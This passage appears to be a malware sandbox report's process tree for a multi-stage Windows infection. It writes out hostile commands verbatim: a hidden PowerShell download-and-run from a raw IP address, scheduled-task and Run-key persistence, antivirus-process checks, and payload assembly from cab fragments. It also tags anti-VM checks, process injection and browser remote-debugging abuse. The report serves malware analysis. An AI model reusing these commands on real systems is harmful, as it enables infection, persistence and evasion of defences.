        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3584,i,15820017676049557782,9757415820980615826,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3596 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:10996
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4388,i,15820017676049557782,9757415820980615826,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4472 /prefetch:9
        8⤵
        Uses browser remote debugging
        
        PID:11204
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4688,i,15820017676049557782,9757415820980615826,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4692 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:11632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4312,i,15820017676049557782,9757415820980615826,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4340 /prefetch:14
        8⤵
        
        PID:11012
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5588,i,15820017676049557782,9757415820980615826,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5620 /prefetch:14
        8⤵
        
        PID:13948
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:4304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        8⤵
        Uses browser remote debugging
        
        PID:12204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x250,0x7ff9d827f208,0x7ff9d827f214,0x7ff9d827f220
        9⤵
        
        PID:12316
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1900,i,16459829984219192515,16004208919773622767,262144 --variations-seed-version --mojo-platform-channel-handle=1896 /prefetch:2
        9⤵
        
        PID:6016
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2004,i,16459829984219192515,16004208919773622767,262144 --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:11
        9⤵
        
        PID:1464
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2448,i,16459829984219192515,16004208919773622767,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:13
        9⤵
        
        PID:13524
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3476,i,16459829984219192515,16004208919773622767,262144 --variations-seed-version --mojo-platform-channel-handle=3500 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:14304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3488,i,16459829984219192515,16004208919773622767,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:14332
    - - C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:12416
      - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        6⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:13588
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:8340
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10836
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:10412
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10608
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        9⤵
        Uses browser remote debugging
        
        PID:4872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x138,0x13c,0x140,0x80,0x144,0x7ff9c6c4dcf8,0x7ff9c6c4dd04,0x7ff9c6c4dd10
        10⤵
        
        PID:2368
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1916,i,4829946913272394204,14898921579351804867,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1912 /prefetch:2
        10⤵
        
        PID:12616
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2112,i,4829946913272394204,14898921579351804867,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2132 /prefetch:11
        10⤵
        
        PID:11872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2420,i,4829946913272394204,14898921579351804867,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2556 /prefetch:13
        10⤵
        
        PID:6448
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,4829946913272394204,14898921579351804867,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3280 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:6628
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,4829946913272394204,14898921579351804867,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3260 /prefetch:1
        10⤵
        
        PID:6648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4328,i,4829946913272394204,14898921579351804867,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3184 /prefetch:9
        10⤵
        Uses browser remote debugging
        
        PID:6908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4396,i,4829946913272394204,14898921579351804867,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4380 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:7516
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4824,i,4829946913272394204,14898921579351804867,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5176 /prefetch:14
        10⤵
        
        PID:12428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        9⤵
        Uses browser remote debugging
        
        PID:10836
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ff9d091dcf8,0x7ff9d091dd04,0x7ff9d091dd10
        10⤵
        
        PID:2452
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1820,i,13700189337757786354,3758937143045362265,262144 --variations-seed-version --mojo-platform-channel-handle=2460 /prefetch:11
        10⤵
        
        PID:12696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2432,i,13700189337757786354,3758937143045362265,262144 --variations-seed-version --mojo-platform-channel-handle=2428 /prefetch:2
        10⤵
        
        PID:6172
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2008,i,13700189337757786354,3758937143045362265,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:13
        10⤵
        
        PID:12760
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3264,i,13700189337757786354,3758937143045362265,262144 --variations-seed-version --mojo-platform-channel-handle=3276 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:12836
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3288,i,13700189337757786354,3758937143045362265,262144 --variations-seed-version --mojo-platform-channel-handle=3312 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:12768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,13700189337757786354,3758937143045362265,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:9
        10⤵
        Uses browser remote debugging
        
        PID:6812
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        7⤵
        
        PID:6408
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:4484
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:7504
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        7⤵
        
        PID:9524
        
        C:\Users\Admin\AppData\Local\Temp\is-006NF.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-006NF.tmp\Bell_Setup16.tmp" /SL5="$11025C,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        8⤵
        
        PID:9692
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        9⤵
        
        PID:9908
        
        C:\Users\Admin\AppData\Local\Temp\is-Q0LQ4.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q0LQ4.tmp\Bell_Setup16.tmp" /SL5="$D005A,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        10⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        11⤵
        
        PID:10416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10388
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8016
        
        C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        7⤵
        
        PID:1080
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        8⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        9⤵
        
        PID:13848
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        10⤵
        
        PID:6044
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        11⤵
        
        PID:4660
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatformw.exe"
        12⤵
        Modifies registry key
        
        PID:2852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatformw.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe\"'"
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4724
    - - C:\Users\Admin\AppData\Local\Temp\10369110101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369110101\Rm3cVPI.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:9892
    - - C:\Users\Admin\AppData\Local\Temp\10369120101\2bf597a585.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369120101\2bf597a585.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5888
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 744
        6⤵
        Program crash
        
        PID:5532
    - - C:\Users\Admin\AppData\Local\Temp\10369130101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369130101\TbV75ZR.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:10568
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:10880
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        
        PID:10748
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10748 -s 532
        7⤵
        Program crash
        
        PID:11856
    - - C:\Users\Admin\AppData\Local\Temp\10369140101\hYjiwV0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369140101\hYjiwV0.exe"
        5⤵
        
        PID:3544
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:5456
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:11204
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ff9c6c4dcf8,0x7ff9c6c4dd04,0x7ff9c6c4dd10
        8⤵
        
        PID:12552
    - - C:\Users\Admin\AppData\Local\Temp\10369150101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369150101\EPTwCQd.exe"
        5⤵
        
        PID:3764
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:4188
    - - C:\Users\Admin\AppData\Local\Temp\10369160101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369160101\7IIl2eE.exe"
        5⤵
        
        PID:3176
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        6⤵
        
        PID:11792
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:6576
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        
        PID:6632
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:7620
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        
        PID:7672
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        7⤵
        
        PID:8992
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        7⤵
        
        PID:6300
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        7⤵
        
        PID:9304
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        7⤵
        
        PID:9784
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        7⤵
        
        PID:10408
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        7⤵
        
        PID:11296
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        
        PID:11520
    - - C:\Users\Admin\AppData\Local\Temp\10369170101\u75a1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369170101\u75a1_003.exe"
        5⤵
        
        PID:10616
    - - C:\Users\Admin\AppData\Local\Temp\10369180101\e2a402cfb6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369180101\e2a402cfb6.exe"
        5⤵
        
        PID:7800
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 9S93ymaS1xE /tr "mshta C:\Users\Admin\AppData\Local\Temp\pUV4FeAj5.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        
        PID:7948
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn 9S93ymaS1xE /tr "mshta C:\Users\Admin\AppData\Local\Temp\pUV4FeAj5.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3812
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\pUV4FeAj5.hta
        6⤵
        
        PID:10324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PGTAKXG4ZMN9WS4UO6FAUWDVWAPGF7VR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12996
        
        C:\Users\Admin\AppData\Local\TempPGTAKXG4ZMN9WS4UO6FAUWDVWAPGF7VR.EXE
        
        "C:\Users\Admin\AppData\Local\TempPGTAKXG4ZMN9WS4UO6FAUWDVWAPGF7VR.EXE"
        8⤵
        
        PID:1384
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10369190121\am_no.cmd" "
        5⤵
        
        PID:5048
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        6⤵
        Delays execution with timeout.exe
        
        PID:7424
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2Y8961.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2Y8961.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:2548
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:5940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
1⤵
